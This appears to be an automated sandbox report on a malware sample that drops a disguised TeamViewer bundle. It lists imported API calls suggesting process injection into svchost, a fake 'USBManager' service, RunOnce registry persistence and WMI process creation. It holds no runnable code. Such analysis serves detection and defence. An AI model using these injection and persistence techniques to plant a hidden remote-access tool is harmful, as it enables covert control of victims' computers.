Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332750 GetFileAttributesA,GetProcessHeap,GetProcessHeap,HeapAlloc,wsprintfA,RtlZeroMemory,RtlZeroMemory,CreateProcessA,NtGetContextThread,NtSetContextThread,NtResumeThread,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F336D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3323B0 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetCommandLineA,lstrcmpiA,lstrcmpiA,StrRChrA,wsprintfA,OpenEventA,CreateEventA,RtlZeroMemory,CreateThread,NtTerminateThread,CloseHandle,VirtualFree,CloseHandle,CloseHandle,LocalFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,ExitProcess,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F337790 PostThreadMessageA,WaitForSingleObject,NtTerminateThread,CloseHandle,PostQuitMessage,PostMessageA,CreateThread,CallWindowProcW,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3319F0 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B1F0 NtSuspendThread,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33ADE0 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AFC0 NtGetContextThread,NtSetContextThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33AE20 NtOpenThread,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F338400 NtQuerySystemInformation,RtlZeroMemory,NtQueryVirtualMemory,RtlCompareMemory,NtWriteVirtualMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F331C00 FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,NtFreeVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B270 NtResumeThread,NtClose,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332640 RtlZeroMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,RtlMoveMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B0A0 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F334EF0 RtlZeroMemory,RtlZeroMemory,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,NtTerminateProcess,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3314E0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33B2D0 RtlMoveMemory,NtFlushInstructionCache,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F332ED0 CreatePipe,RtlZeroMemory,RtlZeroMemory,CreateProcessA,CloseHandle,CloseHandle,GetProcessHeap,HeapAlloc,GetTickCount,ReadFile,MultiByteToWideChar,GetProcessHeap,HeapAlloc,MultiByteToWideChar,WideCharToMultiByte,GetProcessHeap,HeapAlloc,WideCharToMultiByte,GetProcessHeap,HeapFree,GetTickCount,ReadFile,GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapFree,NtTerminateProcess,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,CloseHandle,CloseHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3318D0 NtProtectVirtualMemory,
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: No import functions for PE file found
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer.exel& vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTeamViewer_Resource.dll\ vs 77Etc0bR2v.exe
Source: 77Etc0bR2v.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TeamViewer.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Teamviewer_Resource_ja.dll.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F333700 OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,CloseServiceHandle,
Source: 77Etc0bR2v.exeVirustotal: Detection: 37%
Source: 77Etc0bR2v.exeReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\user\Desktop\77Etc0bR2v.exeJump to behavior
Source: 77Etc0bR2v.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\Desktop\77Etc0bR2v.exe 'C:\Users\user\Desktop\77Etc0bR2v.exe'
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe 'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
Source: C:\Users\user\Desktop\77Etc0bR2v.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004C6E36 AdjustTokenPrivileges,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F335B40 GetProcessHeap,HeapFree,CharLowerA,GetProcessHeap,HeapAlloc,lstrlenA,RtlComputeCrc32,Sleep,Sleep,GetDlgItem,PostMessageA,PostMessageA,PostMessageA,Sleep,Sleep,PostMessageA,Sleep,GetTickCount,RtlRandom,wsprintfA,wsprintfA,GetFileAttributesA,DeleteFileA,wsprintfA,ExpandEnvironmentStringsA,PathIsRelativeA,wsprintfA,StrRChrA,SHCreateDirectoryExA,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,wsprintfA,wsprintfA,DeleteFileA,GetTickCount,RtlRandom,wsprintfA,WritePrivateProfileStringA,wsprintfA,wsprintfA,GetProcessHeap,HeapFree,LocalFree,HeapFree,GetProcessHeap,WaitForSingleObject,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewerJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Local\Temp\nso5B2E.tmpJump to behavior
Source: nso5B2F.tmp.1.drBinary string: Driver.GetDriverIPAddress.GetAdaptersInfo2.Error = Driver.GetDriverIPAddress.Memory allocation errorDriver.GetDriverIPAddress.GetAdaptersInfo.Error = Driver.NoSubkeys DriverConnector.GetGUIDfromRegistry: RegCloseKey(unit_key) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(component_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegQueryValueEx(net_cfg_instance_id_string) failed with error DriverConnector.GetGUIDfromRegistry: RegCloseKey(adapter_key) failed with error Driver.KeyError ComponentIdDriver.NoRegKey SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}DriverConnector.RemoveIPAddresses: DeleteIPAddress() failed with error DriverConnector.Close: CloseHandle failed\DEVICE\TCPIP_CDriverConnector::Init() GetIndex failed DriverConnector.Init: GetGUIDfromRegistry failedDriverConnector.Open: FlushIpNetTable failed with error DriverConnector.Open: IpRenewAddress failed with error Driver.Invalid.IPDriver.TAP_IOCTL_SET_MEDIA_STATUS.RejectedDriver.GetMAC.FailedDriver.DHCP.Failed1.0.0.7255.0.0.0DriverConnector.Open: DeviceIOControl(MTU) failedDriverConnector.Open: CreateFile failed with error \\.\Global\.dgt
Source: classification engineClassification label: mal76.evad.winEXE@14/11@4/4
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3329D0 CoInitializeEx,CoCreateInstance,SysAllocString,SysAllocString,SysFreeString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,VariantInit,VariantInit,lstrlenW,SysAllocStringLen,GetProcessHeap,HeapFree,PathQuoteSpacesW,VariantInit,SysAllocString,GetProcessHeap,HeapFree,VariantInit,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Windows\SysWOW64\svchost.exeCode function: OpenSCManagerA,OpenSCManagerA,OpenSCManagerA,OpenServiceA,wsprintfA,RegSetValueExA,wsprintfA,CreateServiceA,ChangeServiceConfig2A,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RegSetValueExA,RegSetValueExA,lstrlenA,RegSetValueExA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,wsprintfA,RegCreateKeyExA,RtlZeroMemory,RegQueryValueExA,lstrcmpiA,RegSetValueExA,RegCloseKey,RtlZeroMemory,QueryServiceStatusEx,CloseServiceHandle,CloseServiceHandle,
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolder,762AA680,lstrcmpi,lstrcat,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3396D0 SwitchDesktop,SetThreadDesktop,LoadLibraryA,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlZeroMemory,GetSystemDirectoryA,PathAddBackslashA,lstrcatA,LoadLibraryExA,LoadStringW,LoadStringW,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,wsprintfW,FormatMessageW,FreeLibrary,wsprintfW,GetLastError,GetProcessHeap,HeapAlloc,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,RtlZeroMemory,WritePrivateProfileStringW,CoTaskMemFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,Sleep,SwitchDesktop,SetThreadDesktop,Sleep,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\DynGateInstanceMutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flagMKKJJIAAADFBAAAA
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer3_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeMutant created: \Sessions\1\BaseNamedObjects\TeamViewer_Win32_Instance_MutexH1
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F334E50 FindResourceW,LoadResource,SizeofResource,LockResource,GetProcessHeap,HeapAlloc,RtlMoveMemory,FreeResource,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile created: C:\Program Files (x86)\QSJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile written: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 77Etc0bR2v.exeStatic file information: File size 1828192 > 1048576
Source: 77Etc0bR2v.exeStatic PE information: certificate valid
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TeamViewer_qs.pdbPS source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmp
Source: Binary string: c:\TeamViewer5_Release\TeamViewer\qs_release\TV.pdb source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp, svchost.exe, 00000006.00000002.748672807.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.467680448.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.479287656.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.475980706.000000006F33D000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485151608.000000006F33D000.00000002.00020000.sdmp, nso5B2F.tmp.1.dr
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F33C101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0075C004 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053E60D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0053BD8D push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_0075BFE4 push ebp; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F33C101 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F33C101 push ecx; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 11_2_026F4DB0 push esi; ret
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02721B50 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02725320 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02721B50 push ecx; retf
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_02725320 push ecx; iretd
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 12_3_026F703A push ecx; ret
Source: C:\Users\user\Desktop\77Etc0bR2v.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeWMI Queries: IWbemServices::ExecMethod - Root\Cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\Teamviewer_Resource_ja.dllJump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeJump to dropped file
Source: C:\Users\user\Desktop\77Etc0bR2v.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer\TV.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_004E177C __EH_prolog3,GetModuleFileNameW,PathRemoveFileSpecW,_wcscat_s,_memset,GetPrivateProfileStringW,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 3_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_6F3344D0 GetPrivateProfileIntA,GetProcessHeap,HeapAlloc,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,WritePrivateProfileStringA,RtlZeroMemory,SHFileOperationA,GetProcessHeap,HeapFree,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\USBManager\ParametersJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F3337D0 QueryServiceConfigA,QueryServiceConfigA,GetProcessHeap,HeapAlloc,QueryServiceConfigA,ChangeServiceConfigA,GetProcessHeap,HeapFree,QueryServiceStatus,StartServiceA,
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce TeamViewer.exeJump to behavior
Source: C:\Users\user\Desktop\77Etc0bR2v.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\77Etc0bR2v.exeProcess information set: NOOPENFILEERRORBOX
